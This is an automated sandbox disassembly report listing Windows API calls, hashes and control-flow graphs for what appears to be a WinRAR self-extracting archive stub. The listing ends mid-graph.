                        • GetLastError.KERNEL32(?,-00000028,?,?,?,?,?,?,?,?,?,?,0018114C,00000000), ref: 00174E66
                        • FindNextFileW.KERNEL32(?,-00000278,00000274,00174C97,000000FF,?,?,?,?,0017FA7D,001CB1E4,-00000070,00000000), ref: 00174E91
                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,0018114C,00000000), ref: 00174E9E
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: FileFind$ErrorFirstLast$H_prolog3_Next
                        • String ID:
                        • API String ID: 3831798110-0
                        • Opcode ID: d99db5f89ba94827db764bac8ede56731ddfb498ff6c76712ff167852c7d6e4c
                        • Instruction ID: 33b62773c8c3a702573ce076c780e9ae2ecce6e333311c83045f83b1efc94e42
                        • Opcode Fuzzy Hash: d99db5f89ba94827db764bac8ede56731ddfb498ff6c76712ff167852c7d6e4c
                        • Instruction Fuzzy Hash: E0513E71904619DFCF14DF68C889AEDB7B9BF19320F148299E419E3690DB34AE84CF61
                        APIs
                        • GetCurrentProcess.KERNEL32(001963DC,?,00195398,001963DC,001AC1F0,0000000C,001954EF,001963DC,00000002,00000000,?,001963DC), ref: 001953E3
                        • TerminateProcess.KERNEL32(00000000,?,00195398,001963DC,001AC1F0,0000000C,001954EF,001963DC,00000002,00000000,?,001963DC), ref: 001953EA
                        • ExitProcess.KERNEL32 ref: 001953FC
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: Process$CurrentExitTerminate
                        • String ID:
                        • API String ID: 1703294689-0
                        • Opcode ID: 2ec6cdee06e4a8d10ccd3c6ac6c0dac172c981f56ce3855fcd6aacfa3365fb26
                        • Instruction ID: 57f2c7939974a142283b4471968ec30b6d9f4ffab902cebf6537635d012f0425
                        • Opcode Fuzzy Hash: 2ec6cdee06e4a8d10ccd3c6ac6c0dac172c981f56ce3855fcd6aacfa3365fb26
                        • Instruction Fuzzy Hash: A8E0B631100648ABCF126F68DD09A593B6AFF61791B404414FD46AB922CB75ED92CB80
                        APIs
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0017E4C0
                          • Part of subcall function 0017F4EE: __EH_prolog3_GS.LIBCMT ref: 0017F4F5
                          • Part of subcall function 00174235: __EH_prolog3_GS.LIBCMT ref: 0017423C
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: H_prolog3_$Unothrow_t@std@@@__ehfuncinfo$??2@
                        • String ID:
                        • API String ID: 4214654750-0
                        • Opcode ID: 8eca02f85094ad7277f055875b42285bf44a03e9febb2285688c19455808c85a
                        • Instruction ID: 68c546e3784d3bf7b82ed9ff53aec88cb40c6ce2b6548af28c9b83a2c9eb62c9
                        • Opcode Fuzzy Hash: 8eca02f85094ad7277f055875b42285bf44a03e9febb2285688c19455808c85a
                        • Instruction Fuzzy Hash: 72D1C2B49043549BD726DF28AC45B2A3BF5FF5C318F888299F459836A2D73098C1CB93
                        APIs
                        • __EH_prolog3_catch_GS.LIBCMT ref: 0018786A
                          • Part of subcall function 00171B78: GetDlgItem.USER32(00000000,00003021), ref: 00171BBC
                          • Part of subcall function 00171B78: SetWindowTextW.USER32(00000000,001A2668), ref: 00171BD2
                        • EndDialog.USER32(?,00000000), ref: 00187978
                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 001879B7
                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001879D1
                        • IsDialogMessageW.USER32(?,?), ref: 001879E4
                        • TranslateMessage.USER32(?), ref: 001879F2
                        • DispatchMessageW.USER32(?), ref: 001879FC
                        • EndDialog.USER32(?,00000001), ref: 00187A3E
                        • GetDlgItem.USER32(?,00000068), ref: 00187A64
                        • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00187A7F
                        • SendMessageW.USER32(00000000,000000C2,00000000,001A2668), ref: 00187A92
                        • SetFocus.USER32(00000000), ref: 00187A99
                        • GetLastError.KERNEL32(00000000,?), ref: 00187B80
                        • GetLastError.KERNEL32(00000000,?), ref: 00187BAC
                        • GetTickCount.KERNEL32 ref: 00187BD9
                        • GetLastError.KERNEL32 ref: 00187C35
                        • GetCommandLineW.KERNEL32 ref: 00187D59
                        • _wcslen.LIBCMT ref: 00187D66
                        • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,?,winrarsfxmappingfile.tmp,?,001CAB80,00000400,00000001,00000001), ref: 00187DE5
                        • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 00187E03
                        • ShellExecuteExW.SHELL32(0000003C), ref: 00187E3C
                        • WaitForInputIdle.USER32(?,00002710), ref: 00187E6B
                        • Sleep.KERNEL32(00000064), ref: 00187E85
                        • UnmapViewOfFile.KERNEL32(?,?,?,?,?,?,?,001CAB80,00000400), ref: 00187EC1
                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,001CAB80,00000400), ref: 00187ECD
                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00187FD2
                          • Part of subcall function 00171B53: GetDlgItem.USER32(?,?), ref: 00171B68
                          • Part of subcall function 00171B53: ShowWindow.USER32(00000000), ref: 00171B6F
                        • SetDlgItemTextW.USER32(?,00000065,001A2668), ref: 00187FEA
                        • GetDlgItem.USER32(?,00000065), ref: 00187FF3
                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00188002
                        • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_00017630,00000000,?), ref: 00188382
                        • EndDialog.USER32(?,00000001), ref: 00188396
                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00188011
                          • Part of subcall function 00185335: __EH_prolog3_GS.LIBCMT ref: 0018533C
                          • Part of subcall function 00185335: ShowWindow.USER32(?,00000000,00000038), ref: 00185364
                          • Part of subcall function 00185335: GetWindowRect.USER32(?,?), ref: 001853A8
                          • Part of subcall function 00185335: ShowWindow.USER32(?,00000005,?,00000000), ref: 00185443
                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 001880AF
                        • SendMessageW.USER32(?,00000080,00000001,00030479), ref: 001881E4
                        • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,00050EC9), ref: 001881FD
                        • GetDlgItem.USER32(?,00000068), ref: 00188206
                        • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0018821E
                        • GetDlgItem.USER32(?,00000066), ref: 00188246
                        • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 001882BD
                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 001882D1
                        • EnableWindow.USER32(?,00000000), ref: 00188507
                        • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00188548
                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0018856D
                          • Part of subcall function 00188CAF: __EH_prolog3_GS.LIBCMT ref: 00188CB9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: Item$Message$TextWindow$Send$Dialog$ErrorFileLastShow$H_prolog3_LongView$CloseCommandCountCreateDispatchEnableExecuteFocusH_prolog3_catch_HandleIdleInputLineMappingParamRectShellSleepTickTranslateUnmapWait_wcslen
                        • String ID: -el -s2 "-d%s" "-sp%s"$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_$winrarsfxmappingfile.tmp
                        • API String ID: 3616063595-3000381960
                        • Opcode ID: beeaa16f08644b6876e70cf1437ddfee0a39859625c72007f5bc16f93258648f
                        • Instruction ID: 42ce590cd4b181f8433ee21f2100f47c9c94abb423c770d155e1ac588ce67386
                        • Opcode Fuzzy Hash: beeaa16f08644b6876e70cf1437ddfee0a39859625c72007f5bc16f93258648f
                        • Instruction Fuzzy Hash: 5D72C270904248AEEB25EBA4DC49FEEBB79AF21304F544059F109B75D2DB748E84CF62

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 379 17a590-17a5e6 call 18c600 GetModuleHandleW 382 17a63d-17a8a1 379->382 383 17a5e8-17a5f8 GetProcAddress 379->383 386 17a8a7-17a8b2 call 194bfd 382->386 387 17a9b0 382->387 384 17a612-17a622 GetProcAddress 383->384 385 17a5fa-17a610 383->385 384->382 388 17a624-17a639 384->388 385->384 386->387 394 17a8b8-17a8cd call 175eb3 386->394 389 17a9b2-17a9d3 call 175eb3 call 17654f 387->389 388->382 404 17a9d5-17a9e1 call 175032 389->404 402 17a8d2-17a8ea CreateFileW 394->402 403 17a8cf 394->403 406 17a8f0-17a8fc SetFilePointer 402->406 407 17a99b-17a9ae CloseHandle call 171770 402->407 403->402 411 17a9e3-17a9f1 call 17a473 404->411 412 17aa18-17aa49 call 1714a3 call 1766d5 call 171770 call 174461 404->412 406->407 409 17a902-17a91c ReadFile 406->409 407->389 409->407 413 17a91e-17a929 409->413 411->412 423 17a9f3-17aa16 CompareStringW 411->423 447 17aa4e-17aa51 412->447 417 17ac07-17ac0c call 18c7bf 413->417 418 17a92f-17a962 call 1714a3 413->418 429 17a976-17a989 call 179b75 418->429 423->412 427 17aa53-17aa57 423->427 427->404 430 17aa5d 427->430 436 17a964-17a96b 429->436 437 17a98b-17a996 call 171770 * 2 429->437 433 17aa61-17aa65 430->433 438 17aa67 433->438 439 17aaab-17aaad 433->439 445 17a970-17a971 call 17a473 436->445 446 17a96d 436->446 437->407 444 17aa69-17aa9f call 1714a3 call 1766d5 call 171770 call 174461 438->444 441 17aab3-17aac6 call 1765bf call 175032 439->441 442 17abd2-17ac04 call 171770 * 2 call 18c3c4 439->442 464 17ab47-17ab7b call 17a2ad AllocConsole 441->464 465 17aac8-17ab45 call 17a473 * 2 call 177fca call 17a2ad call 177fca call 1714a3 call 185d7e call 171549 441->465 482 17aaa1-17aaa5 444->482 483 17aaa9 444->483 445->429 446->445 447->427 453 17aa5f 447->453 453->433 476 17abc2 464->476 477 17ab7d-17abbc GetCurrentProcessId AttachConsole call 17ac56 call 17ac4b GetStdHandle WriteConsoleW Sleep FreeConsole 464->477 479 17abc5-17abcc call 171549 ExitProcess 465->479 476->479 477->476 482->444 487 17aaa7 482->487 483->439 487->439
                        APIs
                        • GetModuleHandleW.KERNEL32(kernel32,B19080A7), ref: 0017A5DC
                        • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0017A5EE
                        • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0017A618
                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0017A8DF
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0017A8F4
                        • ReadFile.KERNEL32(00000000,?,00007FFE,?,00000000), ref: 0017A914
                        • CloseHandle.KERNEL32(00000000), ref: 0017A99C
                        • CompareStringW.KERNEL32(00000400,00001001,?,000000FF,DXGIDebug.dll,000000FF,?,?,?), ref: 0017AA0D
                        • AllocConsole.KERNEL32 ref: 0017AB73
                        • GetCurrentProcessId.KERNEL32 ref: 0017AB7D
                        • AttachConsole.KERNEL32(00000000), ref: 0017AB84
                        • GetStdHandle.KERNEL32(000000F4,00000000,00000000,?,00000000), ref: 0017ABA4
                        • WriteConsoleW.KERNEL32(00000000), ref: 0017ABAB
                        • Sleep.KERNEL32(00002710), ref: 0017ABB6
                        • FreeConsole.KERNEL32 ref: 0017ABBC
                        • ExitProcess.KERNEL32 ref: 0017ABCC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentExitFreeModulePointerReadSleepStringWrite
                        • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                        • API String ID: 2644799563-3298887752
                        • Opcode ID: 82262011584060d2354e03ff3e12dd869476126ff155347b45596b3d3d173a2c
                        • Instruction ID: ebcb54ae14736be650fcc02d86fd3cab785161f13cd9947f82687fa77661bf7c
                        • Opcode Fuzzy Hash: 82262011584060d2354e03ff3e12dd869476126ff155347b45596b3d3d173a2c
                        • Instruction Fuzzy Hash: EFF17E7540028C9BCB25DF68CD49BDE3BB8BF56314F508119F949AB281DB709A49CBA1

                        Control-flow Graph

                        APIs
                          • Part of subcall function 001875D8: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 001875E9
                          • Part of subcall function 001875D8: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001875FA
                          • Part of subcall function 001875D8: IsDialogMessageW.USER32(0001048C,?), ref: 0018760E
                          • Part of subcall function 001875D8: TranslateMessage.USER32(?), ref: 0018761C
                          • Part of subcall function 001875D8: DispatchMessageW.USER32(?), ref: 00187626
                        • GetDlgItem.USER32(00000068,00000000), ref: 0018A4F5
                        • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,00186CE1,00000001,?,?), ref: 0018A51A
                        • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0018A529
                        • SendMessageW.USER32(00000000,000000C2,00000000,001A2668), ref: 0018A537
                        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0018A551
                        • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0018A56B
                        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0018A5AF
                        • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0018A5C2
                        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0018A5D5
                        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0018A5FC
                        • SendMessageW.USER32(00000000,000000C2,00000000,001A2690), ref: 0018A60B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                        • String ID: \
                        • API String ID: 3569833718-2967466578
                        • Opcode ID: 078020717cfff3de86959a2dc7524c7c4f6da8560d928ff5224763131783adc0
                        • Instruction ID: 15968bf66cf74cb8fc7aa6021b3d7bb28c26fae97bb7af9e34609e411a2bcdb5
                        • Opcode Fuzzy Hash: 078020717cfff3de86959a2dc7524c7c4f6da8560d928ff5224763131783adc0
                        • Instruction Fuzzy Hash: EC310F71245300AFE310AF25DC59F6BBFA8EF5A304F48050AF54596291D770DE848BE6

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 608 18a800-18a81c call 18c468 611 18a822-18a828 608->611 612 18ab27-18ab34 call 171770 call 18c417 608->612 611->612 613 18a82e-18a854 call 18dc30 611->613 619 18a85d-18a869 613->619 620 18a856 613->620 622 18a86b 619->622 623 18a86d-18a876 619->623 620->619 622->623 624 18a878-18a87b 623->624 625 18a884-18a887 623->625 628 18a87d 624->628 629 18a87f-18a882 624->629 626 18a889 625->626 627 18a88b-18a895 625->627 626->627 630 18a89b-18a8a8 627->630 631 18a92e 627->631 628->629 629->627 632 18a8aa 630->632 633 18a8ac-18a8b6 630->633 634 18a931-18a933 631->634 632->633 635 18a8b8 633->635 636 18a8ec-18a8f9 633->636 637 18a93c-18a93e 634->637 638 18a935-18a93a 634->638 639 18a8cf-18a8d2 635->639 642 18a8fb 636->642 643 18a8fd-18a907 636->643 640 18a95f-18a971 call 175e3d 637->640 641 18a940-18a947 637->641 638->637 638->640 646 18a8ba-18a8bf 639->646 647 18a8d4 639->647 661 18a989-18a9c4 call 1714a3 call 17444f call 171770 640->661 662 18a973-18a980 call 17bf3c 640->662 641->640 648 18a949-18a955 641->648 642->643 644 18a90d-18a912 643->644 645 18ab37-18ab3d 643->645 651 18a914 644->651 652 18a916-18a91c 644->652 657 18ab3f 645->657 658 18ab41-18ab48 645->658 653 18a8c1 646->653 654 18a8c3-18a8cd 646->654 647->636 655 18a95c 648->655 656 18a957 648->656 651->652 652->645 663 18a922-18a925 652->663 653->654 654->639 664 18a8d6-18a8db 654->664 655->640 656->655 657->658 659 18ab4a-18ab50 658->659 660 18ab60-18ab66 658->660 665 18ab52 659->665 666 18ab54-18ab5d 659->666 668 18ab68 660->668 669 18ab6a-18ab74 660->669 681 18a9fd-18aa0c ShellExecuteExW 661->681 682 18a9c6-18a9f5 call 1714a3 call 1758d4 call 171770 661->682 662->661 676 18a982 662->676 663->630 670 18a92b 663->670 672 18a8dd 664->672 673 18a8df-18a8e9 664->673 665->666 666->660 668->669 669->634 670->631 672->673 673->636 676->661 683 18aadc-18aae2 681->683 684 18aa12-18aa1c 681->684 715 18a9fa 682->715 716 18a9f7 682->716 686 18aae4-18aaf9 683->686 687 18ab17-18ab23 683->687 688 18aa2a-18aa2c 684->688 689 18aa1e-18aa20 684->689 691 18aafb-18ab0b call 1716b3 686->691 692 18ab0e-18ab16 call 18c3b6 686->692 687->612 694 18aa2e-18aa37 IsWindowVisible 688->694 695 18aa45-18aa56 WaitForInputIdle call 18af00 688->695 689->688 693 18aa22-18aa28 689->693 691->692 692->687 693->688 700 18aa90-18aa9b CloseHandle 693->700 694->695 701 18aa39-18aa43 ShowWindow 694->701 708 18aa5b-18aa62 695->708 705 18aaac-18aab3 700->705 706 18aa9d-18aaaa call 17bf3c 700->706 701->695 711 18aacb-18aacd 705->711 712 18aab5-18aab7 705->712 706->705 706->711 708->700 713 18aa64-18aa66 708->713 711->683 719 18aacf-18aad1 711->719 712->711 718 18aab9-18aabf 712->718 713->700 714 18aa68-18aa77 GetExitCodeProcess 713->714 714->700 720 18aa79-18aa82 714->720 715->681 716->715 718->711 721 18aac1 718->721 719->683 722 18aad3-18aad6 ShowWindow 719->722 723 18aa89 720->723 724 18aa84 720->724 721->711 722->683 723->700 724->723
                        APIs
                        • __EH_prolog3_GS.LIBCMT ref: 0018A807
                        • ShellExecuteExW.SHELL32(?), ref: 0018AA04
                        • IsWindowVisible.USER32(?), ref: 0018AA2F
                        • ShowWindow.USER32(?,00000000), ref: 0018AA3D
                        • WaitForInputIdle.USER32(?,000007D0), ref: 0018AA4D
                        • GetExitCodeProcess.KERNEL32(?,?), ref: 0018AA6F
                        • CloseHandle.KERNEL32(?), ref: 0018AA93
                        • ShowWindow.USER32(?,00000001), ref: 0018AAD6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: Window$Show$CloseCodeExecuteExitH_prolog3_HandleIdleInputProcessShellVisibleWait
                        • String ID: .exe$.inf
                        • API String ID: 3208621885-3750412487
                        • Opcode ID: 56e18b9d94ad6db7d35b4845da5133e937128e7fa7763d4169e577fdfca208f6
                        • Instruction ID: 2176bd00d9f583a8ef817343e7390a2aede858e9f824749e7d5f48543eaf1bae
                        • Opcode Fuzzy Hash: 56e18b9d94ad6db7d35b4845da5133e937128e7fa7763d4169e577fdfca208f6
                        • Instruction Fuzzy Hash: E7B1B031E00208DFEF15EF64CA84BED7BB5AF55314F94801AE844A7250E774AE86CF92
                        APIs
                        • __allrem.LIBCMT ref: 0017D739
                          • Part of subcall function 0017CB19: _swprintf.LIBCMT ref: 0017CB52
                        • __allrem.LIBCMT ref: 0017D7B1
                        • _wcslen.LIBCMT ref: 0017DB92
                          • Part of subcall function 0017C24D: __EH_prolog3_catch.LIBCMT ref: 0017C254
                          • Part of subcall function 0017EE8E: __EH_prolog3_GS.LIBCMT ref: 0017EE98
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: __allrem$H_prolog3_H_prolog3_catch_swprintf_wcslen
                        • String ID: AES-0017$z01$zip$zipx$zx01
                        • API String ID: 538351651-1958518654
                        • Opcode ID: 602b8cd40dacb6f0eef9f5d33c06a5520b57d88c988c063c086c6ebbccb142e8
                        • Instruction ID: 6d9830987df35638f6f2d991d0fa65fb480f2c51611560b83c636c8674828881
                        • Opcode Fuzzy Hash: 602b8cd40dacb6f0eef9f5d33c06a5520b57d88c988c063c086c6ebbccb142e8
                        • Instruction Fuzzy Hash: 8FD2ADB1900248DFDB26DF68EC85BAD7BF9FF18304F54805AE80DA7691D7319A81CB52

                        Control-flow Graph

                        APIs
                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 0017AD33
                          • Part of subcall function 00175032: GetVersionExW.KERNEL32(?), ref: 00175063
                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0017AD57
                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0017AD71
                        • TzSpecificLocalTimeToSystemTime.KERNELBASE(00000000,?,?), ref: 0017AD84
                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 0017AD94
                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 0017ADA4
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: Time$File$System$Local$SpecificVersion
                        • String ID:
                        • API String ID: 2092733347-0
                        • Opcode ID: 3d58bc69d99988de4639bc1421e95119cb4ed5f463f179bd03c83c35183087d9
                        • Instruction ID: adbc2cd41578618682b2b5a1dee5b64e391490a361fe46d12cee285cf099d940
                        • Opcode Fuzzy Hash: 3d58bc69d99988de4639bc1421e95119cb4ed5f463f179bd03c83c35183087d9
                        • Instruction Fuzzy Hash: 704114761083059BC704DFA8C9849ABB7F8FF98704F04891EF999C7610E730D949CBA6

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1614 189773-1897a5 call 171fa4 1617 1897aa-1897b0 1614->1617 1618 1897a7 1614->1618 1619 189a1d 1617->1619 1620 1897b6-1897bb 1617->1620 1618->1617 1623 189a1f-189a23 1619->1623 1621 1897bd 1620->1621 1622 1897c0-1897ce 1620->1622 1621->1622 1624 1897d0-1897dc 1622->1624 1625 1897f6 1622->1625 1626 189a2e-189a32 1623->1626 1627 189a25-189a28 1623->1627 1624->1625 1628 1897de 1624->1628 1629 1897f9-1897fc 1625->1629 1631 189a57 1626->1631 1632 189a34-189a37 1626->1632 1630 189a2a-189a2c 1627->1630 1627->1631 1633 1897e4-1897e8 1628->1633 1634 189802-189807 1629->1634 1635 189a17 1629->1635 1636 189a3a-189a52 call 171fa4 call 18a800 1630->1636 1639 18a40d-18a413 call 1729a7 1631->1639 1632->1631 1637 189a39 1632->1637 1640 1897ee-1897f4 1633->1640 1641 189950-189952 1633->1641 1642 189809 1634->1642 1643 18980c-189837 call 1914de call 17180c 1634->1643 1635->1619 1636->1631 1637->1636 1652 18a3a3-18a3aa 1639->1652 1653 18a415-18a437 1639->1653 1640->1625 1640->1633 1641->1625 1645 189958-18995c 1641->1645 1642->1643 1643->1639 1656 18983d-189841 1643->1656 1645->1629 1655 18a3b1-18a3cd call 171770 call 18b29a 1652->1655 1666 18a439-18a44d 1653->1666 1667 18a3d0-18a3f4 call 171770 call 18726a 1653->1667 1655->1667 1659 189843 1656->1659 1660 189845-18984c 1656->1660 1659->1660 1664 18984e 1660->1664 1665 189851-18988f call 17122c call 179c69 1660->1665 1664->1665 1686 189895-189897 1665->1686 1671 18a457-18a460 1666->1671 1672 18a452 call 18c468 1666->1672 1693 18a3fa-18a40a call 171770 call 18c417 1667->1693 1694 188d1c-188d48 1667->1694 1676 18a462 1671->1676 1677 18a464-18a474 call 175712 1671->1677 1672->1671 1676->1677 1684 18a4ca-18a4cf 